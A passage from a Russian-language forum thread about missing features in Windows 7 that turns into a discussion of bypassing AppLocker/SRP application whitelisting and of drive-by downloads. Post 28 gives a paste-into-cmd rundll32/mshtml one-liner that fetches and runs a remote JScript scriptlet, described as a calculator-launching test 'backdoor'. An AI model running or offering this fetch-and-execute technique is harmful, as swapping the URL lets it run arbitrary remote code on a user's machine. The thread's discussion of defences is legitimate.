26

Re: OFF: Чего не хватает в Windows 7

Вот тут подробней и больше тестов:
https://github.com/api0cradle/UltimateA … ByPassList
Блог автора:
https://oddvar.moe/

27

Re: OFF: Чего не хватает в Windows 7

Если бы я хорошо знал английский, то не спрашивал бы. Malcev, поясните своими словами, в чём заключается уязвимость. Что я должен сделать такого, чтобы случайно запустить вредоносный код? Я же сам не буду вручную запускать незнакомую библиотеку через rundll32.exe.

28 (изменено: Malcev, 2018-06-20 15:16:34)

Re: OFF: Чего не хватает в Windows 7

Проверка запуска скриптов, эксешников, регистрации dll на вашей машине:
Например вбейте этот код в cmd и он создаст бекдоор, через который откроет у вас калькулятор:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

Перед тем как запускать, проверьте, что находится по ссылке:
https://raw.githubusercontent.com/3gstu … aster/test
Должно быть:

<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>

</component>
</package>

29 (изменено: Malcev, 2018-06-20 15:36:37)

Re: OFF: Чего не хватает в Windows 7

ypppu пишет:

Что я должен сделать такого, чтобы случайно запустить вредоносный код?

Повторюсь, ничего запускать не надо, достаточно просто зайти на заражённый сайт.
Можно, конечно, поискать в гугле либо на тематических форумах такие, но вы будете на них заходить и тестировать?
Лично у меня такого желания нет.
Вообще тут у автора много всяких разностей:
https://github.com/3gstudent?tab=repositories

30 (изменено: stealzy, 2018-06-20 16:44:57)

Re: OFF: Чего не хватает в Windows 7

Malcev в тексте по вашей цитате говорится что использование против общих угроз - ок, опасаться нужно прицельного человеческого взлома.

Malcev пишет:

код из этих примеров

Примеры для AppLocker, а не SRP, кроме первой ссылки. Опять таки нужна уязвимость чего-то что бы просто их запустить.

Malcev пишет:

достаточно просто зайти на заражённый сайт

Ну нет, надо иметь старые версии java или flash плагинов, желательно чтобы плагины на странице загружались автоматически а не по запросу. Плагин загрузит .ехе во временную папку и попытается его запустить.

31

Re: OFF: Чего не хватает в Windows 7

Malcev пишет:

Повторюсь, ничего запускать не надо, достаточно просто зайти на заражённый сайт.

Кто будет запускать rundll32.exe?

32 (изменено: Malcev, 2018-06-20 20:34:22)

Re: OFF: Чего не хватает в Windows 7

stealzy пишет:

Примеры для AppLocker, а не SRP

С SRP такие номера не пройдут?

stealzy пишет:

Ну нет, надо иметь старые версии java или flash плагинов

Совсем необязательно, достаточно иметь неапгрейженый броузер и не отключить джаваскрипт (куда сейчас без него).

Атака с помощью скрытой загрузки
Скрытая загрузка — привычный метод распространения вредоносного ПО. Злоумышленники ищут незащищенные сайты и внедряют вредоносные скрипты в их HTTP- или PHP-код. Этот скрипт может установить вредоносное ПО напрямую на компьютер пользователя, посетившего сайт или создать IFRAME-форму, которая перенаправит жертву на сайт, контролируемый злоумышленниками.
Для успеха атаки жертве не нужно выполнять никаких действий: достаточно посетить зараженный ресурс.

alexii пишет:

Кто будет запускать rundll32.exe?

Исполняемый файл, который загрузит и запустит скрипт с зараженного сайта.

33 (изменено: alexii, 2018-06-20 21:03:35)

Re: OFF: Чего не хватает в Windows 7

Malcev пишет:

Исполняемый файл,

Какой исполняемый файл? Откуда он возьмётся, и кто его запустит?

34

Re: OFF: Чего не хватает в Windows 7

https://avatars.mds.yandex.net/get-yablogs/39006/VJXrhHGYx/orig

35 (изменено: stealzy, 2018-06-21 18:15:45)

Re: OFF: Чего не хватает в Windows 7

Пользуясь случаем похвастаюсь почему я не переживаю о подобных вещах. Ключевым моментом во всех сценариях является запуск взломанным процессом другого процесса (payload). Но если запуск процессов находится под контролем...
https://s8.hostingkartinok.com/uploads/images/2018/06/a613720f556ff7be301ad3114768114a.png

Как видно единственным, что браузерам разрешено запускать, является группа "браузеры", куда в частности входят торрент-качалка и флеш.
Помимо этого браузеры входят в группу "Все приложения", которым разрешено запускать эксплорер, архиваторы, текстовые редакторы и медиа-просмотрщики. Поэтому проблем с открытием из меню загрузок браузера нет.
Любая попытка запустить что-то неразрешенное вызовет оповещение-вопрос от HIPS.
Можно заметить что в группу файлов "Веб-браузеры" они добавлены относительными путями, и при отсутсвии SRP браузер может запустить malware с именем firefox.exe, но для начала такой файл надо создать, а разрешения на тихое создание/изменение .exe файлов у браузера нет, так-то.

Malcev пишет:

достаточно иметь неапгрейженый броузер и не отключить джаваскрипт

Интересно, в реальности не встречал, надо бы найти и потестировать.

36

Re: OFF: Чего не хватает в Windows 7

5. В стандартном просмотрщике картинок перестала работать GIF анимация. И сглаживание убрали.

37

Re: OFF: Чего не хватает в Windows 7

У меня жесткие диски зазеркалены с помощью виндовса, но есть огромный минус, что когда зеркало ломается, то опеващание не приходит.
Проблему решил с помощью скрипта на автохотки:
http://forum.script-coding.com/viewtopi … 394#p80394

38

Re: OFF: Чего не хватает в Windows 7

6. Перестали работать DOS-программы.
Можно пользоваться эмулятором, но он не работает с принтером.